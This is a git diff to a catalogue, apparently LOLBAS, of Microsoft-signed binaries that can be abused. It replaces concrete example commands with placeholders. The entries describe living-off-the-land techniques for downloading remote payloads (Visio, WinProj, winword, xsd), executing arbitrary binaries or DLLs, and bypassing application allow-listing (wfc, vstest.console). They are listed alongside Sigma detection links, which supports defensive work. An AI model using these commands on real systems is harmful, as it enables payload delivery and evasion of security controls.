Category: Execute diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 86d34a9..591647f 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -1,10 +1,10 @@ --- Name: VSIISExeLauncher.exe Description: Binary will execute specified binary. Part of VS/VScode installation. -Author: 'timwhite' +Author: timwhite Created: 2021-09-24 Commands: - - Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here" + - Command: VSIISExeLauncher.exe -p {PATH:.exe} -a "{CMD:args}" Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments. Category: Execute @@ -15,8 +15,6 @@ Commands: - Execute: EXE Full_Path: - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe' -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml - IOC: VSIISExeLauncher.exe spawned an unknown process @@ -24,4 +22,3 @@ Resources: - Link: https://github.com/timwhitez Acknowledgement: - Person: timwhite - Handle: diff --git a/yml/OtherMSBinaries/Visio.yml b/yml/OtherMSBinaries/Visio.yml index 2c141e5..fedb32a 100644 --- a/yml/OtherMSBinaries/Visio.yml +++ b/yml/OtherMSBinaries/Visio.yml @@ -4,7 +4,7 @@ Description: Microsoft Visio Executable Author: Avihay Eldad Created: 2024-02-15 Commands: - - Command: Visio.exe https://example.com/payload + - Command: Visio.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml index ed91900..da3c036 100644 --- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml @@ -17,8 +17,6 @@ Full_Path: - Path: c:\Program Files (x86)\Windows Kits\10\bin\\arm64\UIAVerify\VisualUiaVerifyNative.exe - Path: c:\Program Files (x86)\Windows Kits\10\bin\\x64\UIAVerify\VisualUiaVerifyNative.exe - Path: c:\Program Files (x86)\Windows Kits\10\bin\\UIAVerify\VisualUiaVerifyNative.exe -Code_Sample: - - Code: Detection: - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml diff --git a/yml/OtherMSBinaries/VsLaunchBrowser.yml b/yml/OtherMSBinaries/VsLaunchBrowser.yml index 578464c..4332e3a 100644 --- a/yml/OtherMSBinaries/VsLaunchBrowser.yml +++ b/yml/OtherMSBinaries/VsLaunchBrowser.yml @@ -4,7 +4,7 @@ Description: Microsoft Visual Studio browser launcher tool for web applications Author: Avihay Eldad Created: 2024-04-12 Commands: - - Command: VSLaunchBrowser.exe .exe http://example.com/payload + - Command: VSLaunchBrowser.exe .exe {REMOTEURL:.exe} Description: Download and execute payload from remote server Usecase: It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process. Category: Download @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Tags: - Download: INetCache - - Command: VSLaunchBrowser.exe .exe C:\Windows\System32\calc.exe + - Command: VSLaunchBrowser.exe .exe {PATH_ABSOLUTE:.exe} Description: Execute payload via VSLaunchBrowser as parent process Usecase: It will open a local file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process. Category: Execute @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: EXE - - Command: VSLaunchBrowser.exe .exe \\Server\Path\file + - Command: VSLaunchBrowser.exe .exe {PATH_SMB} Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process Usecase: It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process. Category: Execute diff --git a/yml/OtherMSBinaries/Vshadow.yml b/yml/OtherMSBinaries/Vshadow.yml index 36c743d..a463f2a 100644 --- a/yml/OtherMSBinaries/Vshadow.yml +++ b/yml/OtherMSBinaries/Vshadow.yml @@ -4,8 +4,8 @@ Description: VShadow is a command-line tool that can be used to create and manag Author: Ayberk HalaƧ Created: 2023-09-06 Commands: - - Command: 'vshadow.exe -nw -exec=c:\windows\system32\calc.exe C:' - Description: Executes calc.exe from vshadow.exe. + - Command: 'vshadow.exe -nw -exec={PATH_ABSOLUTE:.exe} C:' + Description: Executes specified executable from vshadow.exe. Usecase: Performs execution of specified executable file. Category: Execute Privileges: Administrator diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml index e6fb2f3..f3de11a 100644 --- a/yml/OtherMSBinaries/Vsjitdebugger.yml +++ b/yml/OtherMSBinaries/Vsjitdebugger.yml @@ -1,11 +1,11 @@ --- Name: vsjitdebugger.exe Description: Just-In-Time (JIT) debugger included with Visual Studio -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Vsjitdebugger.exe calc.exe - Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe. + - Command: Vsjitdebugger.exe {PATH:.exe} + Description: Executes specified executable as a subprocess of Vsjitdebugger.exe. Usecase: Execution of local PE file as a subprocess of Vsjitdebugger.exe. Category: Execute Privileges: User @@ -15,8 +15,6 @@ Commands: - Execute: EXE Full_Path: - Path: c:\windows\system32\vsjitdebugger.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml Resources: diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index 40dd205..a281897 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml @@ -4,7 +4,7 @@ Description: The Workflow Command-line Compiler tool is included with the Window Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: wfc.exe c:\path\to\test.xoml + - Command: wfc.exe {PATH_ABSOLUTE:.xoml} Description: Execute arbitrary C# code embedded in a XOML file. Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass diff --git a/yml/OtherMSBinaries/Winproj.yml b/yml/OtherMSBinaries/Winproj.yml index 4ceaf24..8e6f844 100644 --- a/yml/OtherMSBinaries/Winproj.yml +++ b/yml/OtherMSBinaries/Winproj.yml @@ -4,7 +4,7 @@ Description: Microsoft Project Executable Author: Avihay Eldad Created: 2024-02-14 Commands: - - Command: WinProj.exe https://example.com/payload + - Command: WinProj.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml index dddff5e..4c1cbc9 100644 --- a/yml/OtherMSBinaries/Winword.yml +++ b/yml/OtherMSBinaries/Winword.yml @@ -4,7 +4,7 @@ Description: Microsoft Office binary Author: 'Reegun J (OCBC Bank)' Created: 2019-07-19 Commands: - - Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll" + - Command: winword.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index 92970b5..472374a 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -1,7 +1,7 @@ --- Name: Wsl.exe Description: Windows subsystem for Linux executable -Author: 'Matthew Brown' +Author: Matthew Brown Created: 2019-06-27 Commands: - Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Tags: - Execute: CMD - - Command: wsl.exe --exec bash -c "" + - Command: wsl.exe --exec bash -c "{CMD}" Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `) Usecase: Performs execution of arbitrary Linux commands. Category: Execute @@ -40,8 +40,6 @@ Commands: OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Full_Path: - Path: C:\Windows\System32\wsl.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules diff --git a/yml/OtherMSBinaries/vsls-agent.yml b/yml/OtherMSBinaries/vsls-agent.yml index 817ef21..9e6c9ab 100644 --- a/yml/OtherMSBinaries/vsls-agent.yml +++ b/yml/OtherMSBinaries/vsls-agent.yml @@ -4,7 +4,7 @@ Description: Agent for Visual Studio Live Share (Code Collaboration) Author: Jimmy (@bohops) Created: 2022-11-01 Commands: - - Command: vsls-agent.exe --agentExtensionPath c:\path\to\payload.dll + - Command: vsls-agent.exe --agentExtensionPath {PATH_ABSOLUTE:.dll} Description: Load a library payload using the --agentExtensionPath parameter (32-bit) Usecase: Execute proxied payload with Microsoft signed binary Category: Execute diff --git a/yml/OtherMSBinaries/vstest.console.yml b/yml/OtherMSBinaries/vstest.console.yml index c476fec..2bb45a2 100644 --- a/yml/OtherMSBinaries/vstest.console.yml +++ b/yml/OtherMSBinaries/vstest.console.yml @@ -4,7 +4,7 @@ Description: VSTest.Console.exe is the command-line tool to run tests Author: Onat Uzunyayla Created: 2023-09-08 Commands: - - Command: vstest.console.exe testcode.dll + - Command: vstest.console.exe {PATH:.dll} Description: VSTest functionality may allow an adversary to executes their malware by wrapping it as a test method then build it to a .exe or .dll file to be later run by vstest.console.exe. This may both allow AWL bypass or defense bypass in general Usecase: Proxy Execution and AWL bypass, Adversaries may run malicious code embedded inside the test methods of crafted dll/exe Category: AWL Bypass diff --git a/yml/OtherMSBinaries/winfile.yml b/yml/OtherMSBinaries/winfile.yml index 91c83a7..dccea98 100644 --- a/yml/OtherMSBinaries/winfile.yml +++ b/yml/OtherMSBinaries/winfile.yml @@ -4,7 +4,7 @@ Description: Windows File Manager executable Author: Avihay Eldad Created: 2024-04-30 Commands: - - Command: winfile.exe calc.exe + - Command: winfile.exe {PATH:.exe} Description: Execute an executable file with WinFile as a parent process. Usecase: Performs execution of specified file, can be used as a defense evasion Category: Execute diff --git a/yml/OtherMSBinaries/xsd.yml b/yml/OtherMSBinaries/xsd.yml index 435807e..37cfdc9 100644 --- a/yml/OtherMSBinaries/xsd.yml +++ b/yml/OtherMSBinaries/xsd.yml @@ -4,7 +4,7 @@ Description: XML Schema Definition Tool included with the Windows Software Devel Author: Avihay Eldad Created: 2024-04-09 Commands: - - Command: xsd.exe http://example.com/payload + - Command: xsd.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache Category: Download